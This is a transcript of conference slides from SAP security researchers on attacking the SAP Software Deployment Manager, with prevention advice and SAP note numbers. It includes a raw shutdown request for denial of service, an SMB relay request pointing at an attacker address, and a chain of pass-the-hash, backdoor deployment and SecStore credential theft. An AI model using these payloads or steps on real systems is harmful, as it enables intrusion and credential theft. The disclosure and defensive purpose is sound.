injecting evil code in your sap j2ee systems. security of sap software deployment server
TRANSCRIPT
![Page 1: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/1.jpg)
Invest in security to secure investments
Injec&ng evil code in your SAP J2EE systems: Security of SAP So<ware Deployment Server
Dmitry Chastukhin. Director of SAP pentest/research team ERPScan
![Page 2: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/2.jpg)
About ERPScan
• The only 360-‐degree SAP Security solu&on -‐ ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP ( 150+ ) • 60+ presentaDons key security conferences worldwide • 25 Awards and nominaDons • Research team -‐ 20 experts with experience in different areas
of security • Headquarters in Palo Alto (US) and Amsterdam (EU)
2
![Page 3: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/3.jpg)
SAP
Вставьте рисунок на слайд, скруглите верхний левый и нижний правый угол (Формат – Формат рисунка), добавьте контур (оранжевый, толщина – 3)
3
• The most popular business applica&on • More than 250000 customers worldwide • 83% Forbes 500 companies run SAP • Main system – ERP • 3 Plaporms
- NetWeaver ABAP - NetWeaver J2EE - BusinessObjects
![Page 4: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/4.jpg)
SAP insecurity
Espionage • Stealing financial informa&on • Stealing corporate secrets • Stealing supplier and customer lists • Stealing HR data
Fraud • False transac&ons • Modifica&on of master data
Sabotage • Denial of service • Modifica&on of financial reports • Access to technology network (SCADA) by trust rela&ons
4
![Page 5: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/5.jpg)
5
More than 2800 in total
Source: SAP Security in Figures
0
100
200
300
400
500
600
700
800
900
2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013 2014
SAP vulnerabiliDes
![Page 6: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/6.jpg)
Is it remotely exploitable?
6
> 5000 non-‐web SAP services exposed in the world including Dispatcher, Message Server, Sap Host Control, etc.
sapscan.com
![Page 7: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/7.jpg)
What about other services?
0
1
2
3
4
5
6
7
8
9
SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Server httpd
7
Source: SAP Security in Figures
![Page 8: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/8.jpg)
• SAP NetWeaver ABAP • SAP NetWeaver J2EE
– SAP Portal – SAP Solu&on Manager – SAP NetWeaver Development Infrastracture (NWDI)
• SAP BusinessObjects • SAP HANA Extended Applica&on Services • SAP SUP • SAP Fiori
8
SAP ApplicaDon server’s
![Page 9: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/9.jpg)
• Design Time Repository (DTR) • Component Build Service (CBS) • Change Management Service (CMS) • So<ware Landscape Directory (SLD) / NS • So<ware Deployment Manager (SDM)
9
SAP NetWeaver development infrastructure
![Page 10: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/10.jpg)
10
SAP NetWeaver development infrastructure
![Page 11: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/11.jpg)
11
SAP NetWeaver development infrastructure
![Page 12: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/12.jpg)
12
SAP NetWeaver development infrastructure
![Page 13: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/13.jpg)
13
SAP NetWeaver development infrastructure
![Page 14: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/14.jpg)
14
SAP NetWeaver development infrastructure
![Page 15: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/15.jpg)
15
SAP NetWeaver development infrastructure
![Page 16: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/16.jpg)
So^ware Deployment Manager
• Single interface for the deployment • Deploy apps (*.ear, *.war, *.sda) • Implement custom patches
16
![Page 17: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/17.jpg)
SDM server
• Different server modes – standalone – integrated
• Only one user at &me • Only hardcoded admin user • Three ports:
– 50017 – Admin Port – 50018 – GUI Port – 50019 – H�p Port
17
![Page 18: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/18.jpg)
SDM client
• Browsing the distribu&on of deployed components • Deploying and undeploying • Log viewing
18
![Page 19: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/19.jpg)
SDM a_ack intro
• SAP infrastructure includes many Java services • Almost all Java stuff uses UME • Universal user with a password • Only one user at a &me • Ability to deploy evil code => plus, see 1st item
19
![Page 20: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/20.jpg)
SDM a_ack intro
• Thick client Java applica&on (sad story) • Scarce communica&ons se�ngs • Difficult to intercept • Custom protocols
20
![Page 21: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/21.jpg)
SDM a_ack intro
• SAP has its own SAP Java Virtual Machine (JVM) • Java 6 has A�ach API • A�ach to another running JVM • Intercept and modify calls
21
![Page 22: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/22.jpg)
A_ack SAP SDM. DoS
• If a�acker uses an incorrect password 3 &mes, the server will shutdown automa&cally
• Also, if you send this request, you can shutdown the SDM server manually:
[10 spaces]56<?xml version="1.0"?> <ShutDownRequest></ShutDownRequest>
22
![Page 23: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/23.jpg)
A_acking SAP SDM. SMB relay
Packed:
[10 Spaces]<?xml version="1.0"?> <FileAccessRequest f="\\ip_addr\blabla"> </FileAccessRequest>
An old trick, but some&mes it’s very useful
23
![Page 24: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/24.jpg)
PrevenDon
24
• Install note 1724516 • Enable the security features of SDM • SDM server and SDM client need to be updated
h�ps://websmp205.sap-‐ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf
![Page 25: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/25.jpg)
From Nobody to Administrator
Now, I will show an interes0ng a2ack
Compromise Some SAP Services
Compromise SAP SDM
Compromise SAP Server OS
Compromise SAP
25
![Page 26: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/26.jpg)
SDM authenDcaDon abuse
• OK. Let’s see how authen&ca&on in SDM works: – user enters password – hash is calculated locally on client – password hash is sent to server – hash is compared to hash from configura&on file
Pass the hash a_ack here!
26
![Page 27: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/27.jpg)
SDM authenDcaDon abuse
RootFrame.class
27
![Page 28: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/28.jpg)
SDM authenDcaDon abuse
…\SDM\program\config\sdmrepository.sdc
28
![Page 29: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/29.jpg)
SDM authenDcaDon abuse
SMDAuthen&catorImpl.class
29
![Page 30: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/30.jpg)
A_ack on SAP SDM
Read sdmrepository.sdc
Get password hash
Use hash as password to authen&cate on SDM server
Deploy backdoor on SAP Server
PROFIT!
30
![Page 31: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/31.jpg)
File read
• OS command execu&on through CTC (Notes 1467771, 1445998 ) • XML External En&&es (Note 1619539) • Directory Traversal (Note 1630293 ) • Through MMC file read func&on (Notes 927637 and 1439348)
We have something new for u J
31
![Page 32: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/32.jpg)
SAP Log Viewer standalone
• Open ports: 26000 (NI), 1099 (RMI), 5465 (Socket) • You can:
– View log on local server – View log on remote server – Register file as log file
Read log file without authenDcaDon!
32
![Page 33: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/33.jpg)
SAP Log Viewer standalone
A_ack is pre_y easy
Connect to LogViewer standalone Server
Register sdmrepository.sdc file as log file
Read it
33
![Page 34: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/34.jpg)
SAP Log Viewer standalone
34
![Page 35: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/35.jpg)
SAP Log Viewer standalone
When we have a password hash, we can use it as password to authen&cate on SDM server
35
![Page 36: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/36.jpg)
SDM intrusion
Full info about the SDM repository
36
![Page 37: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/37.jpg)
Bypassing SDM restricDons
• Observe all server directories • Read arbitrary files via Log Viewer
37
![Page 38: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/38.jpg)
SDM undeploying
Undeploy any applica&on
38
![Page 39: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/39.jpg)
SDM backdooring
Deploy any applica&on
39
![Page 40: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/40.jpg)
SDM backdooring
• before
• a<er
40
![Page 41: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/41.jpg)
SDM post-‐exploitaDon
41
![Page 42: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/42.jpg)
PrevenDon
42
• Install Note 1724516, 1685106 • Enable the security features of SDM • SDM server and SDM client need to be updated
h�ps://websmp205.sap-‐ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf
![Page 43: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/43.jpg)
“The So=ware Deployment Manager (SDM) uses the database connec0on informa0on, the J2EE Engine administrator user and password from the secure storage in the file system, to connect to the J2EE Engine and perform tasks such as so=ware deployment and undeployment”.
h�p://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm
Wow! J2EE Engine administrator user and password
Where is all this stuff located?
SAP SecStore
43
![Page 44: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/44.jpg)
SAP SecStore
“By default, the J2EE Engine stores secure data in the file \usr\sap\<SID>\SYS\global\security\data\SecStore.proper0es in the file system”.
“The J2EE Engine uses the SAP Java Cryptography Toolkit to encrypt the contents of the secure store with the tripleDES algorithm”.
h�p://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm
OK. Let’s try to read SecStore.proper0es
44
![Page 45: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/45.jpg)
SAP SecStore
• We can execute any OS command (we have our backdoor) • We know the SAP J2EE Engine stores the database
user SAP<SID>DB; its password is here:
\usr\sap\<SID>\SYS\global\security\data\SecStore.properties
• It’s all that we need
45
![Page 46: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/46.jpg)
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
SecStore.properDes
46
But where is the key?
![Page 47: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/47.jpg)
Get the password
• We have an encrypted password • We have a key to decrypt it
47
We got the J2EE admin and JDBC login:password!
![Page 48: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/48.jpg)
PrevenDon
48
Restrict read access to files SecStore.proper0es and SecStore.key h�p://help.sap.com/saphelp_nw73ehp1/helpdata/en/cd/14c93ec2f7df6ae10000000a114084/content.htm
![Page 49: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/49.jpg)
Post-‐exploitaDon
49
![Page 50: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/50.jpg)
SDM hacking demo
50
![Page 51: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/51.jpg)
SAP Guides
It’s all in your hands
Regular security assessments
ABAP code review
Monitoring technical security
SegregaDon of DuDes
Security events monitoring
Conclusion
It is possible to protect yourself from these kinds of issues, and we are working close with SAP to keep customers secure
![Page 52: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/52.jpg)
Future work
I'd like to thank SAP's Product Security Response Team for the great coopera0on to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new a2acks and demos, follow us at @erpscan and a2end future presenta0ons:
52
web: www.erpscan.com e-‐mail: [email protected], [email protected]